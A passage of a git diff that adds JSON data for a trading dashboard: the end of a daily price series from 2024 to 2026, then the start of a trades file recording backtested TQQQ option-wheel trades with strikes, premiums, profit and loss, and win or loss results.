], + [ + "2024-05-31", + 445.8138732910156 + ], + [ + "2024-06-03", + 448.2076110839844 + ], + [ + "2024-06-04", + 449.43408203125 + ], + [ + "2024-06-05", + 458.49462890625 + ], + [ + "2024-06-06", + 458.3363342285156 + ], + [ + "2024-06-07", + 457.9307556152344 + ], + [ + "2024-06-10", + 459.780517578125 + ], + [ + "2024-06-11", + 462.9358215332031 + ], + [ + "2024-06-12", + 468.9992370605469 + ], + [ + "2024-06-13", + 471.5412902832031 + ], + [ + "2024-06-14", + 473.9844970703125 + ], + [ + "2024-06-17", + 479.790771484375 + ], + [ + "2024-06-18", + 479.9390869140625 + ], + [ + "2024-06-20", + 476.2397766113281 + ], + [ + "2024-06-21", + 474.9637145996094 + ], + [ + "2024-06-24", + 469.5564270019531 + ], + [ + "2024-06-25", + 474.9260559082031 + ], + [ + "2024-06-26", + 475.9068908691406 + ], + [ + "2024-06-27", + 477.1353454589844 + ], + [ + "2024-06-28", + 474.6585693359375 + ], + [ + "2024-07-01", + 477.4425048828125 + ], + [ + "2024-07-02", + 482.45550537109375 + ], + [ + "2024-07-03", + 486.4777526855469 + ], + [ + "2024-07-05", + 491.55023193359375 + ], + [ + "2024-07-08", + 492.71923828125 + ], + [ + "2024-07-09", + 493.1452331542969 + ], + [ + "2024-07-10", + 498.28704833984375 + ], + [ + "2024-07-11", + 487.3595275878906 + ], + [ + "2024-07-12", + 490.22265625 + ], + [ + "2024-07-15", + 491.540283203125 + ], + [ + "2024-07-16", + 491.7285461425781 + ], + [ + "2024-07-17", + 477.29388427734375 + ], + [ + "2024-07-18", + 475.03509521484375 + ], + [ + "2024-07-19", + 470.8245849609375 + ], + [ + "2024-07-22", + 477.8387756347656 + ], + [ + "2024-07-23", + 476.1545715332031 + ], + [ + "2024-07-24", + 459.07476806640625 + ], + [ + "2024-07-25", + 454.01220703125 + ], + [ + "2024-07-26", + 458.6685485839844 + ], + [ + "2024-07-29", + 459.5899658203125 + ], + [ + "2024-07-30", + 453.27911376953125 + ], + [ + "2024-07-31", + 466.6933288574219 + ], + [ + "2024-08-01", + 455.38934326171875 + ], + [ + "2024-08-02", + 444.5807189941406 + ], + [ + "2024-08-05", + 431.32501220703125 + ], + [ + "2024-08-06", + 435.4463806152344 + ], + [ + "2024-08-07", + 430.7305603027344 + ], + [ + "2024-08-08", + 443.9070129394531 + ], + [ + "2024-08-09", + 446.2253112792969 + ], + [ + "2024-08-12", + 447.186279296875 + ], + [ + "2024-08-13", + 458.28216552734375 + ], + [ + "2024-08-14", + 458.4308166503906 + ], + [ + "2024-08-15", + 470.01214599609375 + ], + [ + "2024-08-16", + 470.61651611328125 + ], + [ + "2024-08-19", + 476.79852294921875 + ], + [ + "2024-08-20", + 475.7979431152344 + ], + [ + "2024-08-21", + 478.0171203613281 + ], + [ + "2024-08-22", + 470.438232421875 + ], + [ + "2024-08-23", + 475.5403137207031 + ], + [ + "2024-08-26", + 470.92364501953125 + ], + [ + "2024-08-27", + 472.3304443359375 + ], + [ + "2024-08-28", + 466.970703125 + ], + [ + "2024-08-29", + 466.2870788574219 + ], + [ + "2024-08-30", + 471.844970703125 + ], + [ + "2024-09-03", + 457.5193176269531 + ], + [ + "2024-09-04", + 456.3304748535156 + ], + [ + "2024-09-05", + 456.7565002441406 + ], + [ + "2024-09-06", + 444.521240234375 + ], + [ + "2024-09-09", + 450.23760986328125 + ], + [ + "2024-09-10", + 454.39862060546875 + ], + [ + "2024-09-11", + 464.26605224609375 + ], + [ + "2024-09-12", + 468.8233337402344 + ], + [ + "2024-09-13", + 470.92364501953125 + ], + [ + "2024-09-16", + 468.8431396484375 + ], + [ + "2024-09-17", + 469.0908203125 + ], + [ + "2024-09-18", + 467.05987548828125 + ], + [ + "2024-09-19", + 478.8691101074219 + ], + [ + "2024-09-20", + 477.95770263671875 + ], + [ + "2024-09-23", + 479.224609375 + ], + [ + "2024-09-24", + 481.53619384765625 + ], + [ + "2024-09-25", + 481.9826354980469 + ], + [ + "2024-09-26", + 485.6037902832031 + ], + [ + "2024-09-27", + 482.9052734375 + ], + [ + "2024-09-30", + 484.21484375 + ], + [ + "2024-10-01", + 477.4685363769531 + ], + [ + "2024-10-02", + 478.1431884765625 + ], + [ + "2024-10-03", + 477.7860412597656 + ], + [ + "2024-10-04", + 483.47076416015625 + ], + [ + "2024-10-07", + 478.2919921875 + ], + [ + "2024-10-08", + 485.43511962890625 + ], + [ + "2024-10-09", + 489.2547302246094 + ], + [ + "2024-10-10", + 488.69915771484375 + ], + [ + "2024-10-11", + 489.4630432128906 + ], + [ + "2024-10-14", + 493.5703430175781 + ], + [ + "2024-10-15", + 486.972900390625 + ], + [ + "2024-10-16", + 487.03240966796875 + ], + [ + "2024-10-17", + 487.3697204589844 + ], + [ + "2024-10-18", + 490.5643005371094 + ], + [ + "2024-10-21", + 491.5068054199219 + ], + [ + "2024-10-22", + 492.04254150390625 + ], + [ + "2024-10-23", + 484.5025939941406 + ], + [ + "2024-10-24", + 488.4312744140625 + ], + [ + "2024-10-25", + 491.4075622558594 + ], + [ + "2024-10-28", + 491.4869689941406 + ], + [ + "2024-10-29", + 496.2093200683594 + ], + [ + "2024-10-30", + 492.459228515625 + ], + [ + "2024-10-31", + 480.0281677246094 + ], + [ + "2024-11-01", + 483.5799255371094 + ], + [ + "2024-11-04", + 482.171142578125 + ], + [ + "2024-11-05", + 488.3221740722656 + ], + [ + "2024-11-06", + 501.5865173339844 + ], + [ + "2024-11-07", + 509.483642578125 + ], + [ + "2024-11-08", + 510.0789489746094 + ], + [ + "2024-11-11", + 509.7813415527344 + ], + [ + "2024-11-12", + 508.85858154296875 + ], + [ + "2024-11-13", + 508.2038879394531 + ], + [ + "2024-11-14", + 504.6719970703125 + ], + [ + "2024-11-15", + 492.6477355957031 + ], + [ + "2024-11-18", + 496.0704650878906 + ], + [ + "2024-11-19", + 499.4832763671875 + ], + [ + "2024-11-20", + 499.1955871582031 + ], + [ + "2024-11-21", + 500.9913024902344 + ], + [ + "2024-11-22", + 501.7948913574219 + ], + [ + "2024-11-25", + 502.58856201171875 + ], + [ + "2024-11-26", + 505.28704833984375 + ], + [ + "2024-11-27", + 501.3087463378906 + ], + [ + "2024-11-29", + 505.7136535644531 + ], + [ + "2024-12-02", + 511.21978759765625 + ], + [ + "2024-12-03", + 512.787353515625 + ], + [ + "2024-12-04", + 519.126953125 + ], + [ + "2024-12-05", + 517.6882934570312 + ], + [ + "2024-12-06", + 522.3214721679688 + ], + [ + "2024-12-09", + 518.2537841796875 + ], + [ + "2024-12-10", + 516.4879150390625 + ], + [ + "2024-12-11", + 525.7341918945312 + ], + [ + "2024-12-12", + 522.34130859375 + ], + [ + "2024-12-13", + 526.3394775390625 + ], + [ + "2024-12-16", + 533.9191284179688 + ], + [ + "2024-12-17", + 531.5678100585938 + ], + [ + "2024-12-18", + 512.3905029296875 + ], + [ + "2024-12-19", + 510.1086730957031 + ], + [ + "2024-12-20", + 514.5632934570312 + ], + [ + "2024-12-23", + 519.5764770507812 + ], + [ + "2024-12-24", + 526.621826171875 + ], + [ + "2024-12-26", + 526.2640380859375 + ], + [ + "2024-12-27", + 519.2684326171875 + ], + [ + "2024-12-30", + 512.3621826171875 + ], + [ + "2024-12-31", + 508.0097961425781 + ], + [ + "2025-01-02", + 507.01611328125 + ], + [ + "2025-01-03", + 515.3134765625 + ], + [ + "2025-01-06", + 521.2359008789062 + ], + [ + "2025-01-07", + 511.9348449707031 + ], + [ + "2025-01-08", + 512.0243530273438 + ], + [ + "2025-01-10", + 503.9952087402344 + ], + [ + "2025-01-13", + 502.37548828125 + ], + [ + "2025-01-14", + 501.89849853515625 + ], + [ + "2025-01-15", + 513.4453735351562 + ], + [ + "2025-01-16", + 509.84814453125 + ], + [ + "2025-01-17", + 518.45361328125 + ], + [ + "2025-01-21", + 521.4942626953125 + ], + [ + "2025-01-22", + 528.1619873046875 + ], + [ + "2025-01-23", + 529.284912109375 + ], + [ + "2025-01-24", + 526.2938842773438 + ], + [ + "2025-01-27", + 510.97100830078125 + ], + [ + "2025-01-28", + 518.5230712890625 + ], + [ + "2025-01-29", + 517.54931640625 + ], + [ + "2025-01-30", + 519.7553100585938 + ], + [ + "2025-01-31", + 519.0000610351562 + ], + [ + "2025-02-03", + 514.8463745117188 + ], + [ + "2025-02-04", + 521.1663208007812 + ], + [ + "2025-02-05", + 523.5313720703125 + ], + [ + "2025-02-06", + 526.2640380859375 + ], + [ + "2025-02-07", + 519.6260986328125 + ], + [ + "2025-02-10", + 525.916259765625 + ], + [ + "2025-02-11", + 524.6641845703125 + ], + [ + "2025-02-12", + 524.9722900390625 + ], + [ + "2025-02-13", + 532.5244140625 + ], + [ + "2025-02-14", + 534.7601928710938 + ], + [ + "2025-02-18", + 535.9724731445312 + ], + [ + "2025-02-19", + 536.12158203125 + ], + [ + "2025-02-20", + 533.8458862304688 + ], + [ + "2025-02-21", + 522.7662963867188 + ], + [ + "2025-02-24", + 516.5953369140625 + ], + [ + "2025-02-25", + 510.08660888671875 + ], + [ + "2025-02-26", + 511.3187561035156 + ], + [ + "2025-02-27", + 497.1188049316406 + ], + [ + "2025-02-28", + 504.96905517578125 + ], + [ + "2025-03-03", + 493.9190673828125 + ], + [ + "2025-03-04", + 492.42852783203125 + ], + [ + "2025-03-05", + 498.84783935546875 + ], + [ + "2025-03-06", + 485.12481689453125 + ], + [ + "2025-03-07", + 488.6922302246094 + ], + [ + "2025-03-10", + 469.7522888183594 + ], + [ + "2025-03-11", + 468.6294250488281 + ], + [ + "2025-03-12", + 473.9159240722656 + ], + [ + "2025-03-13", + 465.38995361328125 + ], + [ + "2025-03-14", + 476.638671875 + ], + [ + "2025-03-17", + 479.7290344238281 + ], + [ + "2025-03-18", + 471.5509033203125 + ], + [ + "2025-03-19", + 477.86090087890625 + ], + [ + "2025-03-20", + 476.2411804199219 + ], + [ + "2025-03-21", + 477.8111877441406 + ], + [ + "2025-03-24", + 488.29644775390625 + ], + [ + "2025-03-25", + 491.0829162597656 + ], + [ + "2025-03-26", + 482.04669189453125 + ], + [ + "2025-03-27", + 479.29998779296875 + ], + [ + "2025-03-28", + 466.68109130859375 + ], + [ + "2025-03-31", + 466.6611633300781 + ], + [ + "2025-04-01", + 470.4229736328125 + ], + [ + "2025-04-02", + 473.8562927246094 + ], + [ + "2025-04-03", + 448.4891357421875 + ], + [ + "2025-04-04", + 420.6339416503906 + ], + [ + "2025-04-07", + 421.6490478515625 + ], + [ + "2025-04-08", + 414.0557861328125 + ], + [ + "2025-04-09", + 463.7552185058594 + ], + [ + "2025-04-10", + 444.0306701660156 + ], + [ + "2025-04-11", + 452.2110900878906 + ], + [ + "2025-04-14", + 455.2762756347656 + ], + [ + "2025-04-15", + 455.7838134765625 + ], + [ + "2025-04-16", + 442.04034423828125 + ], + [ + "2025-04-17", + 441.9607238769531 + ], + [ + "2025-04-21", + 431.0236511230469 + ], + [ + "2025-04-22", + 442.33892822265625 + ], + [ + "2025-04-23", + 452.370361328125 + ], + [ + "2025-04-24", + 465.0987548828125 + ], + [ + "2025-04-25", + 470.28363037109375 + ], + [ + "2025-04-28", + 470.1343688964844 + ], + [ + "2025-04-29", + 473.23931884765625 + ], + [ + "2025-04-30", + 473.1795959472656 + ], + [ + "2025-05-01", + 479.35968017578125 + ], + [ + "2025-05-02", + 486.4752197265625 + ], + [ + "2025-05-05", + 483.5892333984375 + ], + [ + "2025-05-06", + 479.09100341796875 + ], + [ + "2025-05-07", + 480.97186279296875 + ], + [ + "2025-05-08", + 485.9378662109375 + ], + [ + "2025-05-09", + 485.6194152832031 + ], + [ + "2025-05-12", + 505.40362548828125 + ], + [ + "2025-05-13", + 513.1063232421875 + ], + [ + "2025-05-14", + 516.1814575195312 + ], + [ + "2025-05-15", + 516.7486572265625 + ], + [ + "2025-05-16", + 518.9978637695312 + ], + [ + "2025-05-19", + 519.4954223632812 + ], + [ + "2025-05-20", + 517.7638549804688 + ], + [ + "2025-05-21", + 510.56866455078125 + ], + [ + "2025-05-22", + 511.5240783691406 + ], + [ + "2025-05-23", + 506.78692626953125 + ], + [ + "2025-05-27", + 518.709228515625 + ], + [ + "2025-05-28", + 516.4102783203125 + ], + [ + "2025-05-29", + 517.4254150390625 + ], + [ + "2025-05-30", + 516.609375 + ], + [ + "2025-06-02", + 520.689697265625 + ], + [ + "2025-06-03", + 524.7598876953125 + ], + [ + "2025-06-04", + 526.222900390625 + ], + [ + "2025-06-05", + 522.2620239257812 + ], + [ + "2025-06-06", + 527.3672485351562 + ], + [ + "2025-06-09", + 528.1435546875 + ], + [ + "2025-06-10", + 531.63671875 + ], + [ + "2025-06-11", + 529.8452758789062 + ], + [ + "2025-06-12", + 531.0892944335938 + ], + [ + "2025-06-13", + 524.4215698242188 + ], + [ + "2025-06-16", + 531.7162475585938 + ], + [ + "2025-06-17", + 526.5313720703125 + ], + [ + "2025-06-18", + 526.4417114257812 + ], + [ + "2025-06-20", + 524.292236328125 + ], + [ + "2025-06-23", + 529.6832275390625 + ], + [ + "2025-06-24", + 537.783203125 + ], + [ + "2025-06-25", + 539.157958984375 + ], + [ + "2025-06-26", + 544.1992797851562 + ], + [ + "2025-06-27", + 546.0623779296875 + ], + [ + "2025-06-30", + 549.5992431640625 + ], + [ + "2025-07-01", + 544.9664306640625 + ], + [ + "2025-07-02", + 548.7623291015625 + ], + [ + "2025-07-03", + 554.1622924804688 + ], + [ + "2025-07-07", + 549.9878540039062 + ], + [ + "2025-07-08", + 550.2966918945312 + ], + [ + "2025-07-09", + 554.1921997070312 + ], + [ + "2025-07-10", + 553.3952026367188 + ], + [ + "2025-07-11", + 552.1497802734375 + ], + [ + "2025-07-14", + 554.1524047851562 + ], + [ + "2025-07-15", + 554.660400390625 + ], + [ + "2025-07-16", + 555.2283325195312 + ], + [ + "2025-07-17", + 559.7216186523438 + ], + [ + "2025-07-18", + 559.1836547851562 + ], + [ + "2025-07-21", + 562.0828857421875 + ], + [ + "2025-07-22", + 559.1737060546875 + ], + [ + "2025-07-23", + 561.7242431640625 + ], + [ + "2025-07-24", + 562.9197387695312 + ], + [ + "2025-07-25", + 564.2747192382812 + ], + [ + "2025-07-28", + 566.0382690429688 + ], + [ + "2025-07-29", + 565.1614990234375 + ], + [ + "2025-07-30", + 565.9186401367188 + ], + [ + "2025-07-31", + 562.9197387695312 + ], + [ + "2025-08-01", + 551.8309936523438 + ], + [ + "2025-08-04", + 562.0131225585938 + ], + [ + "2025-08-05", + 558.1973266601562 + ], + [ + "2025-08-06", + 565.2212524414062 + ], + [ + "2025-08-07", + 567.1340942382812 + ], + [ + "2025-08-08", + 572.4244995117188 + ], + [ + "2025-08-11", + 570.730712890625 + ], + [ + "2025-08-12", + 577.9041137695312 + ], + [ + "2025-08-13", + 578.193115234375 + ], + [ + "2025-08-14", + 577.7447509765625 + ], + [ + "2025-08-15", + 575.2042236328125 + ], + [ + "2025-08-18", + 574.9750366210938 + ], + [ + "2025-08-19", + 567.1740112304688 + ], + [ + "2025-08-20", + 563.8065185546875 + ], + [ + "2025-08-21", + 561.1962280273438 + ], + [ + "2025-08-22", + 569.85400390625 + ], + [ + "2025-08-25", + 568.210205078125 + ], + [ + "2025-08-26", + 570.4915771484375 + ], + [ + "2025-08-27", + 571.368408203125 + ], + [ + "2025-08-28", + 574.9451293945312 + ], + [ + "2025-08-29", + 568.2898559570312 + ], + [ + "2025-09-02", + 563.527587890625 + ], + [ + "2025-09-03", + 567.9610595703125 + ], + [ + "2025-09-04", + 573.1019287109375 + ], + [ + "2025-09-05", + 573.9288940429688 + ], + [ + "2025-09-08", + 576.728515625 + ], + [ + "2025-09-09", + 578.3624267578125 + ], + [ + "2025-09-10", + 578.5517578125 + ], + [ + "2025-09-11", + 581.9192504882812 + ], + [ + "2025-09-12", + 584.4896850585938 + ], + [ + "2025-09-15", + 589.4910888671875 + ], + [ + "2025-09-16", + 588.992919921875 + ], + [ + "2025-09-17", + 587.8173217773438 + ], + [ + "2025-09-18", + 593.11767578125 + ], + [ + "2025-09-19", + 597.1326904296875 + ], + [ + "2025-09-22", + 600.667724609375 + ], + [ + "2025-09-23", + 596.6779174804688 + ], + [ + "2025-09-24", + 594.583251953125 + ], + [ + "2025-09-25", + 592.0198364257812 + ], + [ + "2025-09-26", + 594.4535522460938 + ], + [ + "2025-09-29", + 597.20654296875 + ], + [ + "2025-09-30", + 598.8424072265625 + ], + [ + "2025-10-01", + 601.7150268554688 + ], + [ + "2025-10-02", + 604.188720703125 + ], + [ + "2025-10-03", + 601.645263671875 + ], + [ + "2025-10-06", + 606.1636962890625 + ], + [ + "2025-10-07", + 602.9718627929688 + ], + [ + "2025-10-08", + 609.8842163085938 + ], + [ + "2025-10-09", + 609.1461181640625 + ], + [ + "2025-10-10", + 588.0000610351562 + ], + [ + "2025-10-13", + 600.4782104492188 + ], + [ + "2025-10-14", + 596.4784545898438 + ], + [ + "2025-10-15", + 600.6876831054688 + ], + [ + "2025-10-16", + 598.46337890625 + ], + [ + "2025-10-17", + 602.393310546875 + ], + [ + "2025-10-20", + 609.9839477539062 + ], + [ + "2025-10-21", + 609.8244018554688 + ], + [ + "2025-10-22", + 603.9493408203125 + ], + [ + "2025-10-23", + 609.0264282226562 + ], + [ + "2025-10-24", + 615.52978515625 + ], + [ + "2025-10-27", + 626.4918823242188 + ], + [ + "2025-10-28", + 631.3095703125 + ], + [ + "2025-10-29", + 634.15234375 + ], + [ + "2025-10-30", + 624.45703125 + ], + [ + "2025-10-31", + 627.4694213867188 + ], + [ + "2025-11-03", + 630.4716796875 + ], + [ + "2025-11-04", + 617.67431640625 + ], + [ + "2025-11-05", + 621.6941528320312 + ], + [ + "2025-11-06", + 610.1136474609375 + ], + [ + "2025-11-07", + 608.1885375976562 + ], + [ + "2025-11-10", + 621.6442260742188 + ], + [ + "2025-11-11", + 619.9884643554688 + ], + [ + "2025-11-12", + 619.4996948242188 + ], + [ + "2025-11-13", + 606.8519897460938 + ], + [ + "2025-11-14", + 607.310791015625 + ], + [ + "2025-11-17", + 602.1240234375 + ], + [ + "2025-11-18", + 594.7926635742188 + ], + [ + "2025-11-19", + 598.3436279296875 + ], + [ + "2025-11-20", + 584.1797485351562 + ], + [ + "2025-11-21", + 588.568603515625 + ], + [ + "2025-11-24", + 603.6201782226562 + ], + [ + "2025-11-25", + 607.3407592773438 + ], + [ + "2025-11-26", + 612.70703125 + ], + [ + "2025-11-28", + 617.67431640625 + ], + [ + "2025-12-01", + 615.599609375 + ], + [ + "2025-12-02", + 620.4172973632812 + ], + [ + "2025-12-03", + 621.9334716796875 + ], + [ + "2025-12-04", + 621.35498046875 + ], + [ + "2025-12-05", + 623.8884887695312 + ], + [ + "2025-12-08", + 622.6915283203125 + ], + [ + "2025-12-09", + 623.4595336914062 + ], + [ + "2025-12-10", + 626.0130615234375 + ], + [ + "2025-12-11", + 623.98828125 + ], + [ + "2025-12-12", + 612.0586547851562 + ], + [ + "2025-12-15", + 608.9865112304688 + ], + [ + "2025-12-16", + 610.1934204101562 + ], + [ + "2025-12-17", + 598.8822631835938 + ], + [ + "2025-12-18", + 607.5601196289062 + ], + [ + "2025-12-19", + 615.47998046875 + ], + [ + "2025-12-22", + 618.4302368164062 + ], + [ + "2025-12-23", + 621.3265380859375 + ], + [ + "2025-12-24", + 623.144287109375 + ], + [ + "2025-12-26", + 623.1043090820312 + ], + [ + "2025-12-29", + 620.088134765625 + ], + [ + "2025-12-30", + 618.64990234375 + ], + [ + "2025-12-31", + 613.536376953125 + ], + [ + "2026-01-02", + 612.347900390625 + ], + [ + "2026-01-05", + 617.2117309570312 + ], + [ + "2026-01-06", + 622.6348876953125 + ], + [ + "2026-01-07", + 623.2341918945312 + ], + [ + "2026-01-08", + 619.6885986328125 + ], + [ + "2026-01-09", + 625.86083984375 + ], + [ + "2026-01-12", + 626.3801879882812 + ], + [ + "2026-01-13", + 625.4513549804688 + ], + [ + "2026-01-14", + 618.769775390625 + ], + [ + "2026-01-15", + 620.9970092773438 + ], + [ + "2026-01-16", + 620.4776611328125 + ], + [ + "2026-01-20", + 607.2942504882812 + ], + [ + "2026-01-21", + 615.50390625 + ], + [ + "2026-01-22", + 619.978271484375 + ], + [ + "2026-01-23", + 621.935791015625 + ], + [ + "2026-01-26", + 624.67236328125 + ], + [ + "2026-01-27", + 630.335205078125 + ], + [ + "2026-01-28", + 632.4225463867188 + ], + [ + "2026-01-29", + 628.6373291015625 + ], + [ + "2026-01-30", + 621.0868530273438 + ], + [ + "2026-02-02", + 625.3515014648438 + ], + [ + "2026-02-03", + 615.7435913085938 + ], + [ + "2026-02-04", + 604.9871826171875 + ], + [ + "2026-02-05", + 596.2781982421875 + ], + [ + "2026-02-06", + 608.8822631835938 + ], + [ + "2026-02-09", + 613.54638671875 + ], + [ + "2026-02-10", + 610.699951171875 + ], + [ + "2026-02-11", + 612.337890625 + ], + [ + "2026-02-12", + 599.8836059570312 + ], + [ + "2026-02-13", + 601.1619873046875 + ], + [ + "2026-02-17", + 600.542724609375 + ], + [ + "2026-02-18", + 605.027099609375 + ], + [ + "2026-02-19", + 602.7100219726562 + ], + [ + "2026-02-20", + 608.0433349609375 + ], + [ + "2026-02-23", + 600.652587890625 + ], + [ + "2026-02-24", + 607.1044921875 + ], + [ + "2026-02-25", + 615.9033813476562 + ], + [ + "2026-02-26", + 608.4727783203125 + ], + [ + "2026-02-27", + 606.5252075195312 + ], + [ + "2026-03-02", + 607.32421875 + ], + [ + "2026-03-03", + 600.8224487304688 + ], + [ + "2026-03-04", + 609.9808959960938 + ], + [ + "2026-03-05", + 608.1431274414062 + ], + [ + "2026-03-06", + 598.9946899414062 + ], + [ + "2026-03-09", + 606.99462890625 + ], + [ + "2026-03-10", + 607.004638671875 + ], + [ + "2026-03-11", + 606.9247436523438 + ], + [ + "2026-03-12", + 596.5078735351562 + ], + [ + "2026-03-13", + 592.9722900390625 + ], + [ + "2026-03-16", + 599.6239013671875 + ], + [ + "2026-03-17", + 602.5502319335938 + ], + [ + "2026-03-18", + 594.15087890625 + ], + [ + "2026-03-19", + 592.273193359375 + ], + [ + "2026-03-20", + 581.3269653320312 + ], + [ + "2026-03-23", + 588.0 + ], + [ + "2026-03-24", + 583.97998046875 + ], + [ + "2026-03-25", + 587.8200073242188 + ], + [ + "2026-03-26", + 573.7899780273438 + ], + [ + "2026-03-27", + 562.5800170898438 + ], + [ + "2026-03-30", + 558.280029296875 + ], + [ + "2026-03-31", + 577.1799926757812 + ], + [ + "2026-04-01", + 584.3099975585938 + ], + [ + "2026-04-02", + 584.97998046875 + ], + [ + "2026-04-06", + 588.5 + ], + [ + "2026-04-07", + 588.5900268554688 + ], + [ + "2026-04-08", + 606.0900268554688 + ], + [ + "2026-04-09", + 610.1900024414062 + ], + [ + "2026-04-10", + 611.0700073242188 + ], + [ + "2026-04-13", + 617.3900146484375 + ], + [ + "2026-04-14", + 628.5999755859375 + ], + [ + "2026-04-15", + 637.4000244140625 + ], + [ + "2026-04-16", + 640.469970703125 + ], + [ + "2026-04-17", + 648.8499755859375 + ], + [ + "2026-04-20", + 646.7899780273438 + ], + [ + "2026-04-21", + 644.3300170898438 + ], + [ + "2026-04-22", + 655.1099853515625 + ], + [ + "2026-04-23", + 651.4199829101562 + ] + ] +} \ No newline at end of file diff --git a/data/dashboard/wheel_history/20260424T185137_70fe1c_aggressive_TQQQ/trades.json b/data/dashboard/wheel_history/20260424T185137_70fe1c_aggressive_TQQQ/trades.json new file mode 100644 index 0000000..2845ba3 --- /dev/null +++ b/data/dashboard/wheel_history/20260424T185137_70fe1c_aggressive_TQQQ/trades.json @@ -0,0 +1,2006 @@ +[ + { + "date": "2021-05-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 24.96, + "spot": 25.28704071044922, + "premium": 0.38631203422278126, + "close_cost": 0.0, + "pnl": 32.65120342227813, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2021-05-10 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 23.77, + "spot": 22.923093795776367, + "premium": 0.36890664413529617, + "close_cost": 0.8469062042236324, + "pnl": -50.78995600883362, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2021-05-12 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 23.38, + "spot": 21.07253074645996, + "premium": 0.686294375067316, + "close_cost": 0.08787221108146825, + "pnl": 53.86221639858478, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2021-05-19 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 21.49, + "spot": 22.137500762939453, + "premium": 0.6319173330910548, + "close_cost": 0.6475007629394547, + "pnl": -4.548342984839989, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2021-05-20 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 20.81, + "spot": 23.417375564575195, + "premium": 0.3231207559898408, + "close_cost": 0.0846631708579515, + "pnl": 17.86575851318893, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2021-06-01 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 23.07, + "spot": 24.25788688659668, + "premium": 0.3580163906148872, + "close_cost": 0.032470210138792144, + "pnl": 26.57461804760951, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2021-06-04 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 22.2, + "spot": 24.82857894897461, + "premium": 0.31644787396552587, + "close_cost": 0.10377247602677198, + "pnl": 15.28753979387539, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2021-09-22 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 29.96, + "spot": 32.84927749633789, + "premium": 0.14406755176237596, + "close_cost": 0.015117323303504016, + "pnl": 6.915022845887194, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2021-10-04 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 31.06, + "spot": 28.424638748168945, + "premium": 0.12741147690431642, + "close_cost": 2.6353612518310534, + "pnl": -253.7849774926737, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2021-10-11 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 28.99, + "spot": 29.764209747314453, + "premium": 0.6224747145026246, + "close_cost": 0.7742097473144547, + "pnl": -18.16350328118301, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2021-10-13 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.98, + "spot": 30.15103530883789, + "premium": 0.3289931723170989, + "close_cost": 0.15903902627129707, + "pnl": 11.015414604580183, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2021-10-20 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 31.37, + "spot": 34.002586364746094, + "premium": 0.370814921348944, + "close_cost": 0.14987541305504948, + "pnl": 16.113950829389452, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2021-10-26 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 32.66, + "spot": 35.07234191894531, + "premium": 0.3887161829488832, + "close_cost": 0.13603628153566127, + "pnl": 19.287990141322194, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2021-11-11 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 35.7, + "spot": 38.291114807128906, + "premium": 0.16039954890210328, + "close_cost": 0.06107808684612648, + "pnl": 3.95214620559768, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2021-11-29 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 38.38, + "spot": 40.791175842285156, + "premium": 0.1399673799605603, + "close_cost": 0.0, + "pnl": 8.01673799605603, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2021-12-06 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 38.34, + "spot": 36.674564361572266, + "premium": 0.30739867902550433, + "close_cost": 1.6654356384277378, + "pnl": -138.79369594022336, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2021-12-13 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 37.41, + "spot": 38.26963806152344, + "premium": 0.9146644007297766, + "close_cost": 0.8596380615234409, + "pnl": 2.5126339206335704, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2021-12-15 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 35.97, + "spot": 39.58770751953125, + "premium": 0.6238188603607728, + "close_cost": 0.27060152818170113, + "pnl": 29.341733217907166, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2021-12-21 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 32.84, + "spot": 37.26674270629883, + "premium": 0.7326970251093812, + "close_cost": 0.2608151733408697, + "pnl": 41.208185176851146, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2022-01-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 38.92, + "spot": 40.8628044128418, + "premium": 0.9664373580958614, + "close_cost": 0.0, + "pnl": 90.66373580958613, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-01-10 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 38.41, + "spot": 34.52791213989258, + "premium": 0.7459519980105771, + "close_cost": 3.8820878601074185, + "pnl": -316.6035862096841, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-01-18 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 35.22, + "spot": 31.84878158569336, + "premium": 1.1811501040198262, + "close_cost": 0.0, + "pnl": 112.13501040198263, + "hold_days": 8, + "result": "Win" + }, + { + "date": "2022-01-20 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 32.49, + "spot": 29.55168914794922, + "premium": 1.0857059985367101, + "close_cost": 0.17374453772104825, + "pnl": 85.21614608156618, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2022-01-21 00:00:00", + "type": "CALL", + "action": "TP_Close", + 